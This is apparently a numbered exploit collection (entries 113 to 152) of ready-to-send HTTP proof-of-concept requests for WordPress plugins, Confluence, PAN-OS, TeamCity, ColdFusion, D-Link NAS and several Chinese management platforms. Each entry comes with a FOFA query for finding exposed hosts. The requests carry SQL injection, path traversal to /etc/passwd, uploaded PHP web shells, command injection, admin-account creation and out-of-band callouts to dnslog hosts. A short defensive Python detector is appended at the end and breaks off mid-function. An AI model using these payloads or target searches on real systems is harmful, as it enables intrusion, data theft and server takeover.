FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "value obtained in step 1",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"
configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"
jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png
----------767099171--

117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo (百绰智能) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. Beijing Baichuo (百绰智能) Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo (百绰智能) Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328

File path: /upload/2.php

121. Byzoro (北京百绰) Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--

Uploaded file path: boot/web/upload/weblogo/1.php

122. Byzoro (北京百绰) Smart s200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; in plaintext it is sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

Uploaded file URL: http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin console with it; system commands can then be executed from there.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 cloud mall (H5 云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun (福建科立讯) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun (福建科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun (福建科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun (福建科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kelixun (福建科立讯) communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed (base64-encoded)
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass / template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

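Added, defender-side example (not part of the original post or of any product listed here): a small Python triage helper that reads raw HTTP requests in the same format as the POCs in this list and tags the traits several entries share, so the same requests can be recognised in proxy or WAF captures. It covers a ".." path component (entries 126, 129, 132 and 147), a base64-encoded SQL statement in a query parameter (entry 122), SQL keywords combined with quoting characters in a query parameter (entries 131, 135 and 137 to 141), a Basic-auth credential containing shell metacharacters (entry 152) and a multipart upload whose filename has a server-side script extension (entries 120, 121, 130, 133, 155 and 157). The sample requests, hostnames, credential and session values are constructed for the example, and the finding tags are the example's own naming.

```python
"""Triage helper for the request shapes catalogued above (added example).

Parses raw HTTP/1.1 requests, the format the POCs in this list use, and
tags the traits several of them share. All sample requests, hosts,
credentials and session values below are constructed for the example.
"""
import base64
import binascii
import re
from urllib.parse import parse_qs, unquote, urlsplit

# A ".." path component, checked after percent-decoding (entries 126, 129, 132, 147).
TRAVERSAL_RE = re.compile(r"(?:^|/)\.\.(?:/|$)")
# SQL keywords that recur in the injection entries above.
SQL_RE = re.compile(r"\b(select|union|sleep|updatexml|extractvalue|database)\b", re.I)
# Characters that let a Basic-auth credential escape into a shell (entry 152).
SHELL_META = set(";|`$&")
# Extensions that turn an "image" upload into server-side code.
SCRIPT_EXT = (".php", ".jsp", ".aspx")


def b64_text(value):
    """Decode base64 to text; None if value is not valid base64 or UTF-8."""
    try:
        raw = base64.b64decode(value + "=" * (-len(value) % 4), validate=True)
        return raw.decode("utf-8")
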